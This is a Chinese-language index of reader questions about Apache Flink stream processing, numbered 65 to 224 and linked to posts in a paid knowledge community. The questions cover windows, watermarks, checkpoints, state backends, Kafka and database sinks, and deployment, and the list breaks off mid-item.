65、[窗口触发的条件问题](https://t.zsxq.com/V7EmUZR) 66、[flink 定时任务怎么做?有相关的demo么?](https://t.zsxq.com/JY3NJam) 67、[流式处理过程中数据的一致性如何保证或者如何检测](https://t.zsxq.com/7YZ3Fuz) 68、[重启flink单机集群,还报job not found 异常。](https://t.zsxq.com/nEEQvzR) 69、[kafka的数据是用 org.apache.kafka.common.serialization.ByteArraySerialize序列化的,flink这边消费的时候怎么通过FlinkKafkaConsumer创建DataStream<String>?](https://t.zsxq.com/qJyvzNj) 70、[现在公司有一个需求,一些用户的支付日志,通过sls收集,要把这些日志处理后,结果写入到MySQL,关键这些日志可能连着来好几条才是一个用户的,因为发起请求,响应等每个环节都有相应的日志,这几条日志综合处理才能得到最终的结果,请问博主有什么好的方法没有?](https://t.zsxq.com/byvnaEi) 71、[flink 支持hadoop 主备么? hadoop主节点挂了 flink 会切换到hadoop 备用节点?](https://t.zsxq.com/qfie6qR) 72、[请教大家: 实际 flink 开发中用 scala 多还是 java多些? 刚入手 flink 大数据 scala 需要深入学习么?](https://t.zsxq.com/ZVZzZv7) 73、[我使用的是flink是1.7.2最近用了split的方式分流,但是底层的SplitStream上却标注为Deprecated,请问是官方不推荐使用分流的方式吗?](https://t.zsxq.com/Qzbi6yn) 74、[KeyBy 的正确理解,和数据倾斜问题的解释](https://t.zsxq.com/Auf2NVR) 75、[用flink时,遇到个问题 checkpoint大概有2G左右, 有背压时,flink会重启有遇到过这个问题吗](https://t.zsxq.com/3vnIm62) 76、[flink使用yarn-session方式部署,如何保证yarn-session的稳定性,如果yarn-session挂了,需要重新部署一个yarn-session,如何恢复之前yarn-session上的job呢,之前的checkpoint还能使用吗?](https://t.zsxq.com/URzVBIm) 77、[我想请教一下关于sink的问题。我现在的需求是从Kafka消费Json数据,这个Json数据字段可能会增加,然后将拿到的json数据以parquet的格式存入hdfs。现在我可以拿到json数据的schema,但是在保存parquet文件的时候不知道怎么处理。一是flink没有专门的format parquet,二是对于可变字段的Json怎么处理成parquet比较合适?](https://t.zsxq.com/MjyN7Uf) 78、[flink如何在较大的数据量中做去重计算。](https://t.zsxq.com/6qBqVvZ) 79、[flink能在没有数据的时候也定时执行算子吗?](https://t.zsxq.com/Eqjyju7) 80、[使用rocksdb状态后端,自定义pojo怎么实现序列化和反序列化的,有相关demo么?](https://t.zsxq.com/i2zVfIi) 81、[check point 老是失败,是不是自定义的pojo问题?到本地可以,到hdfs就不行,网上也有很多类似的问题 都没有一个很好的解释和解决方案](https://t.zsxq.com/vRJujAi) 82、[cep规则如图,当start事件进入时,时间00:00:15,而后进入end事件,时间00:00:40。我发现规则无法命中。请问within 是从start事件开始计时?还是跟window一样根据系统时间划分的?如果是后者,请问怎么配置才能从start开始计时?](https://t.zsxq.com/MVFmuB6) 83、[Flink聚合结果直接写Mysql的幂等性设计问题](https://t.zsxq.com/EybM3vR) 84、[Flink job打开了checkpoint,用的rocksdb,通过观察hdfs上checkpoint目录,为啥算副本总量会暴增爆减](https://t.zsxq.com/62VzNRF) 85、[Flink 提交任务的 jar包可以指定路径为 HDFS 上的吗]() 86、[在flink web Ui上提交的任务,设置的并行度为2,flink是stand alone部署的。两个任务都正常的运行了几天了,今天有个地方逻辑需要修改,于是将任务cancel掉(在命令行cancel也试了),结果taskmanger挂掉了一个节点。后来用其他任务试了,也同样会导致节点挂掉](https://t.zsxq.com/VfimieI) 87、[一个配置动态更新的问题折腾好久(配置用个静态的map变量存着,有个线程定时去数据库捞数据然后存在这个map里面更新一把),本地 idea 调试没问题,集群部署就一直报 空指针异常。下游的算子使用这个静态变量map去get key在集群模式下会出现这个空指针异常,估计就是拿不到 map](https://t.zsxq.com/nee6qRv) 88、[批量写入MySQL,完成HBase批量写入](https://t.zsxq.com/3bEUZfQ) 89、[用flink清洗数据,其中要访问redis,根据redis的结果来决定是否把数据传递到下流,这有可能实现吗?](https://t.zsxq.com/Zb6AM3V) 90、[监控页面流处理的时候这个发送和接收字节为0。](https://t.zsxq.com/RbeYZvb) 91、[sink到MySQL,如果直接用idea的话可以运行,并且成功,大大的代码上面用的FlinkKafkaConsumer010,而我的Flink版本为1.7,kafka版本为2.12,所以当我用FlinkKafkaConsumer010就有问题,于是改为 FlinkKafkaConsumer就可以直接在idea完成sink到MySQL,但是为何当我把该程序打成Jar包,去运行的时候,就是报FlinkKafkaConsumer找不到呢](https://t.zsxq.com/MN7iuZf) 92、[SocketTextStreamWordCount中输入中文统计不出来,请问这个怎么解决,我猜测应该是需要修改一下代码,应该是这个例子默认统计英文](https://t.zsxq.com/e2VNN7Y) 93、[ Flink 应用程序本地 ide 里面运行的时候并行度是怎么算的?](https://t.zsxq.com/RVRn6AE) 94、[ 请问下flink中对于窗口的全量聚合有apply和process两种 他们有啥区别呢](https://t.zsxq.com/rzbIQBi) 95、[不知道大大熟悉Hbase不,我想直接在Hbase中查询某一列数据,因为有重复数据,所以想使用distinct统计实际数据量,请问Hbase中有没有类似于sql的distinct关键字。如果没有,想实现这种可以不?](https://t.zsxq.com/UJIubub) 96、[ 来分析一下现在Flink,Kafka方面的就业形势,以及准备就业该如何准备的这方面内容呢?](https://t.zsxq.com/VFaQn2j) 97、[ 大佬知道flink的dataStream可以转换为dataSet吗?因为数据需要11分钟一个批次计算五六个指标,并且涉及好几步reduce,计算的指标之间有联系,用Stream卡住了。](https://t.zsxq.com/Zn2FEQZ) 98、[1.如何在同一窗口内实现多次的聚合,比如像spark中的这样2.多个实时流的jion可以用window来处理一批次的数据吗?](https://t.zsxq.com/aIqjmQN) 99、[写的批处理的功能,现在本机跑是没问题的,就是在linux集群上出现了问题,就是不知道如果通过本地调用远程jar包然后传参数和拿到结果参数返回本机](https://t.zsxq.com/ZNvb2FM) 100、[我用standalone开启一个flink集群,上传flink官方用例Socket Window WordCount做测试,开启两个parallelism能正常运行,但是开启4个parallelism后出现错误](https://t.zsxq.com/femmiqf) 101、[ 有使用AssignerWithPunctuatedWatermarks 的案例Demo吗?网上找了都是AssignerWithPeriodicWatermarks的,不知道具体怎么使用?](https://t.zsxq.com/YZ3vbY3) 102、[ 有一个datastream(从文件读取的),然后我用flink sql进行计算,这个sql是一个加总的运算,然后通过retractStreamTableSink可以把文件做sql的结果输出到文件吗?这个输出到文件的接口是用什么呢?](https://t.zsxq.com/uzFyVJe) 103、[ 为啥split这个流设置为过期的](https://t.zsxq.com/6QNNrZz) 104、[ 需要使用flink table的水印机制控制时间的乱序问题,这种场景下我就使用水印+窗口了,我现在写的demo遇到了问题,就是在把触发计算的窗口table(WindowedTable)转换成table进行sql操作时发现窗口中的数据还是乱序的,是不是flink table的WindowedTable不支持水印窗口转table-sql的功能](https://t.zsxq.com/Q7YNRBE) 105、[ Flink 对 SQL 的重视性](https://t.zsxq.com/Jmayrbi) 106、[ flink job打开了checkpoint,任务跑了几个小时后就出现下面的错,截图是打出来的日志,有个OOM,又遇到过的没?](https://t.zsxq.com/ZrZfa2Z) 107、[ 本地测试是有数据的,之前该任务放在集群也是有数据的,可能提交过多次,现在读不到数据了 group id 也换过了, 只能重启集群解决么?](https://t.zsxq.com/emaAeyj) 108、[使用flink清洗数据存到es中,直接在flatmap中对处理出来的数据用es自己的ClientInterface类直接将数据存入es当中,不走sink,这样的处理逻辑是不是会有问题。](https://t.zsxq.com/ayBa6am) 108、[ flink从kafka拿数据(即增量数据)与存量数据进行内存聚合的需求,现在有一个方案就是程序启动的时候先用flink table将存量数据加载到内存中创建table中,然后将stream的增量数据与table的数据进行关联聚合后输出结束,不知道这种方案可行么。目前个人认为有两个主要问题:1是增量数据stream转化成append table后不知道能与存量的table关联聚合不,2是聚合后输出的结果数据是否过于频繁造成网络传输压力过大](https://t.zsxq.com/QNvbE62) 109、[ 设置时间时间特性有什么区别呢, 分别在什么场景下使用呢?两种设置时间延迟有什么区别呢 , 分别在什么场景下使用](https://t.zsxq.com/yzjAQ7a) 110、[ flink从rabbitmq中读取数据,设置了rabbitmq的CorrelationDataId和checkpoint为EXACTLY_ONCE;如果flink完成一次checkpoint后,在这次checkpoint之前消费的数据都会从mq中删除。如果某次flink停机更新,那就会出现mq中的一些数据消费但是处于Unacked状态。在flink又重新开启后这批数据又会重新消费。那这样是不是就不能保证EXACTLY_ONCE了](https://t.zsxq.com/qRrJEaa) 111、[1. 在Flink checkpoint 中, 像 operator的状态信息 是在设置了checkpoint 之后自动的进行快照吗 ?2. 上面这个和我们手动存储的 Keyed State 进行快照(这个应该是增量快照)](https://t.zsxq.com/mAqn2RF) 112、[现在有个实时商品数,交易额这种统计需求,打算用 flink从kafka读取binglog日志进行计算,但binglog涉及到insert和update这种操作时 怎么处理才能统计准确,避免那种重复计算的问题?](https://t.zsxq.com/E2BeQ3f) 113、[我这边用flink做实时监控,功能很简单,就是每条消息做keyby然后三分钟窗口,然后做些去重操作,触发阈值则报警,现在问题是同一个时间窗口同一个人的告警会触发两次,集群是三台机器,standalone cluster,初步结果是三个算子里有两个收到了同样的数据](https://t.zsxq.com/vjIeyFI) 114、[在使用WaterMark的时候,默认是每200ms去设置一次watermark,那么每个taskmanager之间,由于得到的数据不同,所以往往产生的最大的watermark不同。 那么这个时候,是各个taskmanager广播这个watermark,得到全局的最大的watermark,还是说各个taskmanager都各自用自己的watermark。主要没看到广播watermark的源码。不知道是自己观察不仔细还是就是没有广播这个变量。](https://t.zsxq.com/unq3FIa) 115、[现在遇到一个需求,需要在job内部定时去读取redis的信息,想请教flink能实现像普通程序那样的定时任务吗?](https://t.zsxq.com/AeUnAyN) 116、[有个触发事件开始聚合,等到数量足够,或者超时则sink推mq 环境 flink 1.6 用了mapState 记录触发事件 1 数据足够这个OK 2 超时state ttl 1.6支持,但是问题来了,如何在超时时候增加自定义处理?](https://t.zsxq.com/z7uZbY3) 117、[请问impala这种mpp架构的sql引擎,为什么稳定性比较差呢?](https://t.zsxq.com/R7UjeUF) 118、[watermark跟并行度相关不是,过于全局了,期望是keyby之后再针对每个keyed stream 打watermark,这个有什么好的实践呢?](https://t.zsxq.com/q7myfAQ) 119、[请问如果把一个文件的内容读取成datastream和dataset,有什么区别吗??他们都是一条数据一条数据的被读取吗?](https://t.zsxq.com/rB6yfeA) 120、[有没有kylin相关的资料,或者调优的经验?](https://t.zsxq.com/j2j6EyJ) 121、[flink先从jdbc读取配置表到流中,另外从kafka中新增或者修改这个配置,这个场景怎么把两个流一份配置流?我用的connect,接着发不成广播变量,再和实体流合并,但在合并时报Exception in thread "main" java.lang.IllegalArgumentException](https://t.zsxq.com/iMjmQVV) 122、[Flink exactly-once,kafka版本为0.11.0 ,sink基于FlinkKafkaProducer 每五分钟一次checkpoint,但是checkpoint开始后系统直接卡死,at-lease-once 一分钟能完成的checkpoint, 现在十分钟无法完成没进度还是0, 不知道哪里卡住了](https://t.zsxq.com/RFQNFIa) 123、[flink的状态是默认存在于内存的(也可以设置为rocksdb或hdfs),而checkpoint里面是定时存放某个时刻的状态信息,可以设置hdfs或rocksdb是这样理解的吗?](https://t.zsxq.com/NJq3rj2) 124、[Flink异步IO中,下图这两种有什么区别?为啥要加 CompletableFuture.supplyAsync,不太明白?](https://t.zsxq.com/NJq3rj2) 125、[flink的状态是默认存在于内存的(也可以设置为rocksdb或hdfs),而checkpoint里面是定时存放某个时刻的状态信息,可以设置hdfs或rocksdb是这样理解的吗?](https://t.zsxq.com/NJq3rj2) 126、[有个计算场景,从kafka消费两个数据源,两个数据结构都有时间段概念,计算需要做的是匹配两个时间段,匹配到了,就生成一条新的记录。请问使用哪个工具更合适,flink table还是cep?请大神指点一下 我这边之前的做法,将两个数据流转为table.两个table over window后join成新的表。结果job跑一会就oom.](https://t.zsxq.com/rniUrjm) 127、[一个互联网公司,或者一个业务系统,如果想做一个全面的监控要怎么做?有什么成熟的方案可以参考交流吗?有什么有什么度量指标吗?](https://t.zsxq.com/vRZ7qJ2) 128、[怎么深入学习flink,或者其他大数据组件,能为未来秋招找一份大数据相关(计算方向)的工作增加自己的竞争力?](https://t.zsxq.com/3vfyJau) 129、[oppo的实时数仓,其中明细层和汇总层都在kafka中,他们的关系库的实时数据也抽取到kafka的ods,那么在构建数仓的,需要join 三四个大业务表,业务表会变化,那么是大的业务表是从kafka的ods读取吗?实时数仓,多个大表join可以吗](https://t.zsxq.com/VBIunun) 130、[Tuple类型有什么方法转换成json字符串吗?现在的场景是,结果在存储到sink中时希望存的是json字符串,这样应用程序获取数据比较好转换一点。如果Tuple不好转换json字符串,那么应该以什么数据格式存储到sink中](https://t.zsxq.com/vnaURzj) 140、[端到端的数据保证,是否意味着中间处理程序中断,也不会造成该批次处理失败的消息丢失,处理程序重新启动之后,会再次处理上次未处理的消息](https://t.zsxq.com/J6eAmYb) 141、[关于flink datastream window相关的。比如我现在使用滚动窗口,统计一周内去重用户指标,按照正常watermark触发计算,需要等到当前周的window到达window的endtime时,才会触发,这样指标一周后才能产出结果。我能不能实现一小时触发一次计算,每次统计截止到当前时间,window中所有到达元素的去重数量。](https://t.zsxq.com/7qBMrBe) 142、[FLIP-16 Loop Fault Tolerance 是讲现在的checkpoint机制无法在stream loop的时候容错吗?现在这个问题解决了没有呀?](https://t.zsxq.com/uJqzBIe) 143、[现在的需求是,统计各个key的今日累计值,一分钟输出一次。如,各个用户今日累计点击次数。这种需求用datastream还是table API方便点?](https://t.zsxq.com/uZnmQzv) 144、[本地idea可以跑的工程,放在standalone集群上,总报错,报错截图如下,大佬请问这是啥原因](https://t.zsxq.com/BqnYRN7) 145、[比如现在用k8s起了一个flink集群,这时候数据源kafka或者hdfs会在同一个集群上吗,还是会单独再起一个hdfs/kafka集群](https://t.zsxq.com/7MJujMb) 146、[flink kafka sink 的FlinkFixedPartitioner 分配策略,在并行度小于topic的partitions时,一个并行实例固定的写消息到固定的一个partition,那么就有一些partition没数据写进去?](https://t.zsxq.com/6U7QFMj) 147、[基于事件时间,每五分钟一个窗口,五秒钟滑动一次,同时watermark的时间同样是基于事件事件时间的,延迟设为1分钟,假如数据流从12:00开始,如果12:07-12:09期间没有产生任何一条数据,即在12:07-12:09这段间的数据流情况为···· (12:07:00,xxx),(12:09:00,xxx)······,那么窗口[12:02:05-12:07:05],[12:02:10-12:07:10]等几个窗口的计算是否意味着只有等到,12:09:00的数据到达之后才会触发](https://t.zsxq.com/fmq3fYF) 148、[使用flink1.7,当消费到某条消息(protobuf格式),报Caused by: org.apache.kafka.common.KafkaException: Record batch for partition Notify-18 at offset 1803009 is invalid, cause: Record is corrupt 这个异常。 如何设置跳过已损坏的消息继续消费下一条来保证业务不终断? 我看了官网kafka connectors那里,说在DeserializationSchema.deserialize(...)方法中返回null,flink就会跳过这条消息,然而依旧报这个异常](https://t.zsxq.com/MRvv3ZV) 149、[是否可以抽空总结一篇Flink 的 watermark 的原理案例?一直没搞明白基于事件时间处理时的数据乱序和数据迟到底咋回事](https://t.zsxq.com/MRJeAuj) 150、[flink中rpc通信的原理,与几个类的讲解,有没有系统详细的文章样,如有求分享,谢谢](https://t.zsxq.com/2rJyNrF) 151、[Flink中如何使用基于事件时间处理,但是又不使用Watermarks? 我在会话窗口中使用遇到一些问题,图一是基于处理时间的,测试结果session是基于keyby(用户)的,图二是基于事件时间的,不知道是我用法不对还是怎么的,测试结果发现并不是基于keyby(用户的),而是全局的session。不知道怎么修改?](https://t.zsxq.com/bM3ZZRf) 152、[flink实时计算平台,yarn模式日志收集怎么做,为什么会checkpoint失败,报警处理,后需要做什么吗?job监控怎么做](https://t.zsxq.com/BMVzzzB) 153、[有flink与jstorm的在不同应用场景下, 性能比较的数据吗? 从网络上能找大部分都是flink与storm的比较. 在jstorm官网上有一份比较的图表, 感觉参考意义不大, 应该是比较早的flink版本.](https://t.zsxq.com/237EAay) 154、[为什么使用SessionWindows.withGap窗口的话,State存不了东西呀,每次加1 ,拿出来都是null, 我换成 TimeWindow就没问题。](https://t.zsxq.com/J6eAmYb) 155、[请问一下,flink datastream流处理怎么统计去重指标? 官方文档中只看到批处理有distinct概念。](https://t.zsxq.com/y3nYZrf) 156、[好全的一篇文章,对比分析 Flink,Spark Streaming,Storm 框架](https://t.zsxq.com/qRjqFY3) 157、[关于 structured_streaming 的 paper](https://t.zsxq.com/Eau7qNB) 158、[zookeeper集群切换领导了,flink集群项目重启了就没有数据的输入和输出了,这个该从哪方面入手解决?](https://t.zsxq.com/rFYbEeq) 159、[我想请教下datastream怎么和静态数据join呢](https://t.zsxq.com/nEAaYNF) 160、[时钟问题导致收到了明天的数据,这时候有什么比较好的处理方法?看到有人设置一个最大的跳跃阈值,如果当前数据时间 - 历史最大时间 超过阈值就不更新。如何合理的设计水印,有没有一些经验呢?](https://t.zsxq.com/IAAeiA6) 161、[大佬们flink怎么定时查询数据库?](https://t.zsxq.com/EuJ2RRf) 162、[现在我们公司有个想法,就是提供一个页面,在页面上选择source sink 填写上sql语句,然后后台生成一个flink的作业,然后提交到集群。功能有点类似于华为的数据中台,就是页面傻瓜式操作。后台能自动根据相应配置得到结果。请问拘你的了解,可以实现吗?如何实现?有什么好的思路。现在我无从下手](https://t.zsxq.com/vzZBmYB) 163、[请教一下 flink on yarn 的 ha机制](https://t.zsxq.com/VRFIMfy) 164、[在一般的流处理以及cep, 都可以对于eventtime设置watermark, 有时可能需要设置相对大一点的值, 这内存压力就比较大, 有没有办法不应用jvm中的内存, 而用堆外内存, 或者其他缓存, 最好有cache机制, 这样可以应对大流量的峰值.](https://t.zsxq.com/FAiiEyr) 165、[请教一个flink sql的问题。我有两个聚合后的流表A和B,A和Bjoin得到C表。在设置state TTL 的时候是直接对C表设置还是,对A表和B表设置比较好?](https://t.zsxq.com/YnI2F66) 166、[spark改写为flink,会不会很复杂,还有这两者在SQL方面的支持差别大吗?](https://t.zsxq.com/unyneEU) 167、[请问flink allowedLateness导致窗口被多次fire,最终数据重复消费,这种问题怎么处理,数据是写到es中](https://t.zsxq.com/RfyZFUR) 168、[设置taskmanager.numberOfTaskSlots: 4的时候没有问题,但是cpu没有压上去,只用了30%左右,于是设置了taskmanager.numberOfTaskSlots: 8,但是就报错误找不到其中一个自定义的类,然后kafka数据就不消费了。为什么?cpu到多少合适?slot是不是和cpu数量一致是最佳配置?kafka分区数多少合适,是不是和slot,parallesim一致最佳?](https://t.zsxq.com/bIAEyFe) 169、[需求是根据每条日志切分出需要9个字段,有五个指标再根据9个字段的不同组合去做计算。 第一个方法是:我目前做法是切分的9个字段开5分钟大小1分钟计算一次的滑动窗口窗口,进行一次reduce去重,然后再map取出需要的字段,然后过滤再开5分钟大小1分钟计算一次的滑动窗口窗口进行计算保存结果,这个思路遇到的问题是上一个滑动窗口会每一分钟会计算5分钟数据,到第二个窗口划定的5分钟范围的数据会有好多重复,这个思路会造成数据重复。 第二个方法是:切分的9个字段开5分钟大小1分钟计算一次的滑动窗口窗口,再pross方法里完成所有的过滤,聚合计算,但是再高峰期每分钟400万条数据,这个思路担心在高峰期flink计算不过来](https://t.zsxq.com/BUNfYnY) 170、[a,b,c三个表,a和c有eventtime,a和c直接join可以,a和b join后再和c join 就会报错,这是怎么回事呢](https://t.zsxq.com/aAqBEY7) 171、[自定义的source是这样的(图一所示) 使用的时候是这样的(图二所示),为什么无论 sum.print().setParallelism(2)(图2所示)的并行度设置成几最后结果都是这样的](https://t.zsxq.com/zZNNRzr) 172、[刚接触flink,如有问的不合适的地方,请见谅。 1、为什么说flink是有状态的计算? 2、这个状态是什么?3、状态存在哪里](https://t.zsxq.com/i6Mz7Yj) 173、[这边用flink 1.8.1的版本,采用flink on yarn,hadoop版本2.6.0。代码是一个简单的滚动窗口统计函数,但启动的时候报错,如下图片。 (2)然后我把flink版本换成1.7.1,重新提交到2.6.0的yarn平台,就能正常运行了。 (3)我们测试集群hadoop版本是3.0,我用flink 1.8.1版本将这个程序再次打包,提交到3.0版本的yarn平台,也能正常运行。 貌似是flink 1.8.1版本与yarn 2.6.0版本不兼容造成的这个问题](https://t.zsxq.com/vNjAIMN) 174、[StateBackend我使用的是MemoryStateBackend, State是怎么释放内存的,例如我在函数中用ValueState存储了历史状态信息。但是历史状态数据我没有手动释放,那么程序会自动释放么?还是一直驻留在内存中](https://t.zsxq.com/2rVbm6Y) 175、[请问老师是否可以提供一些Apachebeam的学习资料 谢谢](https://t.zsxq.com/3bIEAyv) 176、[flink 的 DataSet或者DataStream支持索引查询以及删除吗,像spark rdd,如果不支持的话,该转换成什么](https://t.zsxq.com/yFEyZVB) 177、[关于flink的状态,能否把它当做数据库使用,类似于内存数据库,在处理过程中存业务数据。如果是数据库可以算是分布式数据库吗?是不是使用rocksdb这种存储方式才算是?支持的单库大小是不是只是跟本地机器的磁盘大小相关?如果使用硬盘存储会不会效率性能有影响](https://t.zsxq.com/VNrn6iI) 178、[我这边做了个http sink,想要批量发送数据,不过现在只能用数量控制发送,但最后的几个记录没法触发发送动作,想问下有没有什么办法](https://t.zsxq.com/yfmiUvf) 179、[请问下如何做定时去重计数,就是根据时间分窗口,窗口内根据id去重计数得出结果,多谢。试了不少办法,没有简单直接办法](https://t.zsxq.com/vNvrfmE) 180、[我有个job使用了elastic search sink. 设置了批量5000一写入,但是看es监控显示每秒只能插入500条。是不是bulkprocessor的currentrequest为0有关](https://t.zsxq.com/rzZbQFA) 181、[有docker部署flink的资料吗](https://t.zsxq.com/aIur7ai) 182、[在说明KeyBy的StreamGraph执行过程时,keyBy的ID为啥是6? 根据前面说,ID是一个静态变量,每取一次就递增1,我觉得应该是3啊,是我理解错了吗](https://t.zsxq.com/VjQjqF6) 183、[有没计划出Execution Graph的远码解析](https://t.zsxq.com/BEmAIQv) 184、[可以分享下物理执行图怎样划分task,以及task如何执行,还有他们之间数据如何传递这块代码嘛?](https://t.zsxq.com/vVjiYJQ) 185、[Flink源码和这个学习项目的结构图](https://t.zsxq.com/FyNJQbQ) 186、[请问flink1.8,如何做到动态加载外部udf-jar包呢?](https://t.zsxq.com/qrjmmaU) 187、[同一个Task Manager中不同的Slot是怎么交互的,比如:source处理完要传递给map的时候,如果在不同的Slot中,他们的内存是相互隔离,是怎么交互的呢? 我猜是通过序列化和反序列化对象,并且通过网络来进行交互的](https://t.zsxq.com/ZFQjQnm) 188、[你们有没有这种业务场景。flink从kafka里面取数据,每一条数据里面有mongdb表A的id,这时我会在map的时候采用flink的异步IO连接A表,然后查询出A表的字段1,再根据该字段1又需要异步IO去B表查询字段2,然后又根据字段2去C表查询字段3.....像这样的业务场景,如果多来几种逻辑,我应该用什么方案最好呢](https://t.zsxq.com/YBQFufi) 189、[今天本地运行flink程序,消费socket中的数据,连续只能消费两条,第三条flink就消费不了了](https://t.zsxq.com/vnufYFY) 190、[源数据经过过滤后分成了两条流,然后再分别提取事件时间和水印,做时间窗口,我测试时一条流没有数据,另一条的数据看日志到了窗口操作那边就没走下去,貌似窗口一直没有等到触发](https://t.zsxq.com/me6EmM3) 191、[有做flink cep的吗,有资料没?](https://t.zsxq.com/fubQrvj) 192、[麻烦问一下 BucketingSink跨集群写,如果任务运行在hadoop A集群,从kafka读取数据处理后写到Hadoo B集群,即使把core-site.xml和hdfs-site.xml拷贝到代码resources下,路径使用hdfs://hadoopB/xxx,会提示ava.lang.RuntimeException: Error while creating FileSystem when initializing the state of the BucketingSink.,跨集群写这个问题 flink不支持吗?](https://t.zsxq.com/fEQVjAe) 193、[想咨询下,如何对flink中的datastream和dataset进行数据采样](https://t.zsxq.com/fIMVJ2J) 194、[一个flink作业经常发生oom,可能是什么原因导致的。 处理流程只有15+字段的解析,redis数据读取等操作,TM配置10g。 业务会在夜间刷数据,qps能打到2500左右~](https://t.zsxq.com/7MVjyzz) 195、[我看到flink 1.8的状态过期仅支持Processing Time,那么如果我使用的是Event time那么状态就不会过期吗](https://t.zsxq.com/jA2NVnU) 196、[请问我想每隔一小时统计一个属性从当天零点到当前时间的平均值,这样的时间窗该如何定义?](https://t.zsxq.com/BQv33Rb) 197、[flink任务里面反序列化一个类,报ClassNotFoundException,可是包里面是有这个类的,有遇到这种情况吗?](https://t.zsxq.com/nEAiIea) 198、[在构造StreamGraph,类似PartitionTransformmation 这种类型的 transform,为什么要添加成一个虚拟节点,而不是一个实际的物理节点呢?](https://t.zsxq.com/RnayrVn) 199、[flink消费kafka的数据写入到hdfs中,我采用了BucketingSink 这个sink将operator出来的数据写入到hdfs文件上,并通过在hive中建外部表来查询这个。但现在有个问题,处于in-progress的文件,hive是无法识别出来该文件中的数据,可我想能在hive中实时查询进来的数据,且不想产生很多的小文件,这个该如何处理呢](https://t.zsxq.com/A2fYNFA) 200、[采用Flink单机集群模式一个jobmanager和两个taskmanager,机器是单机是24核,现在做个简单的功能从kafka的一个topic转满足条件的消息到另一个topic,topic的分区是30,我设置了程序默认并发为30,现在每秒消费2w多数据,不够快,请问可以怎么提高job的性能呢?](https://t.zsxq.com/7AurJU3) 201、[Flink Metric 源码分析](https://t.zsxq.com/Mnm2nI6) 202、[请问怎么理解官网的这段话?按官网的例子,难道只keyby之后才有keyed state,才能托管Flink存储状态么?source和map如果没有自定义operator state的话,状态是不会被保存的?](https://t.zsxq.com/iAi6QRb) 203、[想用Flink做业务监控告警,并要能够支持动态添加CEP规则,问下可以直接使用Flink CEP还是siddhi CEP? 有没有相关的资料学习下?谢谢!](https://t.zsxq.com/3rbeuju) 204、[请问一下,有没有关于水印,触发器的Java方面的demo啊](https://t.zsxq.com/eYJUbm6) 205、[老师,最近我们线上偶尔出现这种情况,就是40个并行度,其他有一个并行度CheckPoint一直失败,其他39个并行度都是毫秒级别就可以CheckPoint成功,这个怎么定位问题呢?还有个问题 CheckPoint的时间分为三部分 Checkpoint Duration (Async)和 Checkpoint Duration (Sync),还有个 end to end 减去同步和异步的时间,这三部分 分别指代哪块?如果发现这三者中的任意一个步骤时间长,该怎么去优化](https://t.zsxq.com/QvbAqVB) 206、[我这边有个场景很依赖消费出来的数据的顺序。在源头侧做了很多处理,将kafka修改成一个分区等等很多尝试,最后消费出来的还是乱序的。能不能在flink消费的时候做处理,来保证处理的数据的顺序。](https://t.zsxq.com/JaUZvbY) 207、[有一个类似于实时计算今天的pv,uv需求,采用source->keyby->window->trigger->process后,在process里采用ValueState计算uv ,问题是 这个window内一天的所有数据是都会缓存到flink嘛? 一天的数据量如果大点,这样实现就有问题了, 这个有其他的实现思路嘛?](https://t.zsxq.com/iQfaAeu) 208、[Flink 注解源码解析](https://t.zsxq.com/f6eAu3J) 209、[如何监控 Flink 的 TaskManager 和 JobManager](https://t.zsxq.com/IuRJYne) 210、[问下,在真实流计算过程中,并行度的设置,是与 kafka topic的partition数一样的吗?](https://t.zsxq.com/v7yfEIq) 211、[Flink的日志 如果自己做平台封装在自己的界面中 请问job Manger 和 taskManger 还有用户自己的程序日志 怎么获取呢 有api还是自己需要利用flume 采集到ELK?](https://t.zsxq.com/Zf2F6mM) 212、[我想问下一般用Flink统计pv uv是怎么做的?uv存到redis? 每个uv都存到redis,会不会撑爆?](https://t.zsxq.com/72VzBEy) 213、[Flink的Checkpoint 机制,在有多个source的时候,barrier n 的流将被暂时搁置,从其他流接收的记录将不会被处理,但是会放进一个输入缓存input buffer。如果被缓存的record大小超出了input buffer会怎么样?不可能一直缓存下去吧,如果其中某一条就一直没数据的话,整个过程岂不是卡死了?](https://t.zsxq.com/zBmm2fq) 214、[公司想实时展示订单数据,汇总金额,并需要和前端交互,实时生成数据需要告诉前端,展示成折线图,这种场景的技术选型是如何呢?包括数据的存储,临时汇总数据的存储,何种形式告诉前端](https://t.zsxq.com/ZnIAi2j) 215、[请问下checkpoint中存储了哪些东西?](https://t.zsxq.com/7EIeEyJ) 216、[我这边有个需求是实时计算当前车辆与前车距离,用经纬度求距离。大概6000台车,10秒一条经纬度数据。gps流与自己join的地方在进行checkpoint的时候特别缓,每次要好几分钟。checkpoint 状态后端是rocksDB。有什么比较好的方案吗?自己实现一个类似last_value的函数取车辆最新的经纬再join,或者弄个10秒的滑动窗口输出车辆最新的经纬度再进行join,这样可行吗?](https://t.zsxq.com/euvFaYz) 217、[flink在启动的时候能不能指定一个时间点从kafka里面恢复数据呢](https://t.zsxq.com/YRnEUFe) 218、[我们线上有个问题,很多业务都去读某个hive表,但是当这个hive表正在写数据的时候,偶尔出现过 读到表里数据为空的情况,这个问题怎么解决呢?](https://t.zsxq.com/7QJEEyr) 219、[使用 InfluxDB 和 Grafana 搭建监控 Flink 的平台](https://t.zsxq.com/yVnaYR7) 220、[flink消费kafka两个不同的topic,然后进行join操作,如果使用事件时间,两个topic都要设置watermaker吗,如果只设置了topic A的watermaker,topic B的不设置会有什么影响吗?](https://t.zsxq.com/uvFU7aY) 221、[请教一个问题,我的Flink程序运行一段时间就会报这个错误,定位好多天都没有定位到。checkpoint 时间是5秒,20秒都不行。Caused by: java.io.IOException: Could not flush and close the file system output stream to hdfs://HDFSaaaa/flink/PointWideTable_OffTest_Test2/1eb66edcfccce6124c3b2d6ae402ec39/chk-355/1005127c-cee3-4099-8b61-aef819d72404 in order to obtain the stream state handle](https://t.zsxq.com/NNFYJMn) 222、[Flink的反压机制相比于Storm的反压机制有什么优势呢?问题2: Flink的某一个节点发生故障,是否会影响其他节点的正常工作?还是会通过Checkpoint容错机制吗把任务转移到其他节点去运行呢?](https://t.zsxq.com/yvRNFEI) 223、[我在验证checkpoint的时候遇到给问题,不管是key state 还是operator state,默认和指定uid是可以的恢复state数据的,当指定uidHash时候无法恢复state数据,麻烦大家给解答一样。我操作state是实现了CheckpointedFunction接口,覆写snapshotState和initializeState,再这两个方法里操作的,然后让程序定时抛出异常,观察发现指定uidHash后snapshotState()方法里context.isRestored()为false,不太明白具体是什么原因](https://t.zsxq.com/ZJmiqZz) 224、[kafka 中的每条数据需要和 es 